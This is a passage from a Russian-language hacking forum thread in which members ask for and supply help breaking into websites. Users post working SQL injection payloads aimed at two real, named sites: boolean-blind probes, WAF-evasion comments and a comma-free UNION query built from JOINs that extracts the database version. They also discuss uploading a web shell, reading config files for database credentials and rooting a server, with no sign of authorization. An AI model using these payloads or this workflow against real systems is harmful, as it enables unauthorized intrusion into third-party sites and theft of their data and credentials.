Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    можно. Можно к примеру попробовать рутнуть сервер.
    $uname -a

    p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.
     
    #1821 ACat, 1 Apr 2017
    Last edited: 3 Apr 2017
  2. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    PHP:
    $var = $_POST['value'];
    $var = addslashes( $var );
    $var = stripslashes($var);
    $var = str_replace( "<?", "&lt;?", $var );
    $var = str_replace( "?>", "?&gt;", $var );
    $var = mysqli_real_escape_string($var);

    ############
    # v1.
    query( "UPDATE comment set text='$var');

    # v2.
    query( "INSERT INTO comment text='$var' WHERE id = '1');
    Ребят, есть варианты провести инъекцию?
     
  3. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Вам в другой тред
     
  4. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    mysqli_real_escape_string
    а вы как думаете?
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    помогите вывод сделать, тайм бейс не крутит(
    Code:
    https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+
     
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    вывод через union мне добиться не удалось, но там boolen есть
    Code:
    118)/**/AND/**/1=2+--+s' | grep 'event_417'
    
    
    118)/**/AND/**/1=1+--+s' | grep 'event_417'
                        <div class="event_417 event">
    
    
    хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6

    Code:
    118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'
                        <div class="event_417 event">
    
    к information_schema тоже доступ есть

    Code:
    118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417'
                        <div class="event_417 event">
    
    ещё там операция = не всегда работает, лучше юзать like
    скульмап по какой то причине в упор скулю не видит
    -----------
    чорт, там запятая фильтруется -_-
     
    _________________________
    #1826 t0ma5, 5 Apr 2017
    Last edited: 6 Apr 2017
    DezMond™ and Gorev like this.
  7. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/
     
  8. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Именно
     
  9. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    В общем, заливаю upload, через него заливаю шелл, открыв его сервер его не обрабатывает как php, а выводит просто текст с кодом.
    Хотя upload работает нормально.
    php
     
  10. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

    Стоп, что-то я не понял... Есть иньжект, sqlmap раскрутил его, залил через mysql в файл.php код и код не исполняется?
    Ааа, понял, в папке, куда залит шелл нету прав...

    Попробуй прочитать конфиг.php. Там будет логин и пароль подключения к БД.

    ssh mysql@server
     
    l0mt1k likes this.
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    мимо, sqlmap не видит самую простую инъекцию and 1=1/and 1=2 впрочем даже если бы видел тамперы там не помогут, фильтруются запятые, плюс некоторые запросы чуть меняешь логику - не отрабатывают, там проще свой скрипт набросать
     
    _________________________
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    чё можно сделать?
    Code:
    http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'
     
  13. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    533
    Likes Received:
    308
    Reputations:
    51
    Code:
    http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    а дальше? какой толк подбирать колонки, если нет вывода?
     
  15. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    533
    Likes Received:
    308
    Reputations:
    51
    Да, сорри, думал как слепую можно раскрутить, ан нет.
     
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    вывод может и есть, запятая похоже опять фильтруется
     
    _________________________
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    Code:
    union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s
    
    5.6.19-67.0-log
     
    _________________________
    RWD, ACat, st55 and 4 others like this.
  18. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    Если бы у меня было известное решение, то, наверное, я бы не спрашивал.
    В любом случае, спасибо за ответ.
     
  19. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    ax*eть.

    Парни подскажите, если есть иньекция но сервер на генту и не возвращает никаких ошибок как действовать??
     
  20. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Вернее что бы не быть голословным вот реальный пример:

    ?id_list=359982' or 1=1 -- 'a --> вывод
    ?id_list=359982' or 1=2 -- 'a --> 404
    ?id_list=359982' ORDER BY 1 -- 'a --> 404
    ?id_list=359982' GROUP BY 1 -- 'a --> 404

    Напомню что ошибки не отображаются.

    Эни айдиас?